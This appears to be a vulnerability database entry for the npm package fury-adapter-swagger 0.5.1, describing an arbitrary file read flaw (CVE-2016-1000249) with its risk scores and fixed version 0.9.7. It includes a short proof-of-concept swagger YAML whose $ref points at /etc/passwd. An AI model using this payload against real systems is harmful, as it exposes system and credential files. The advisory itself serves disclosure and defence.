Lookup for vulnerable packages by Package URL.
| Purl | pkg:npm/fury-adapter-swagger@0.5.1 |
|---|
| Type | npm |
|---|
| Namespace | |
|---|
| Name | fury-adapter-swagger |
|---|
| Version | 0.5.1 |
|---|
| Qualifiers |
|
|---|
| Subpath | |
|---|
| Is_vulnerable | true |
|---|
| Next_non_vulnerable_version | 0.9.7 |
|---|
| Latest_non_vulnerable_version | 0.9.7 |
|---|
| Affected_by_vulnerabilities |
| 0 |
| url |
VCID-t7jm-25zs-aqfq |
| vulnerability_id |
VCID-t7jm-25zs-aqfq |
| summary |
Arbitrary File Read
fury-adapter-swagger is a fury.js adapter for loading swagger HTTP API description documents - either via YAML or JSON.
fury-adapter-swagger has a vulnerability that allows arbitrary file reads off the file system. This could be used to retrieve sensitive data, or cause a denial of service by reading `/dev/zero`. An example proof of concept is provided below:
```
---
swagger: '2.0'
info:
title: Read local files
version: '1.0'
paths:
/foo:
get:
responses:
200:
description: Some description
examples:
text/html:
example:
$ref: '/etc/passwd'
``` |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2016-1000249, GHSA-2r7f-4h2c-5x73
|
| risk_score |
4.1 |
| exploitability |
0.5 |
| weighted_severity |
8.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-t7jm-25zs-aqfq |
|
|
|---|
| Fixing_vulnerabilities |
|
|---|
| Risk_score | null |
|---|
| Resource_url | http://public2.vulnerablecode.io/packages/pkg:npm/fury-adapter-swagger@0.5.1 |
|---|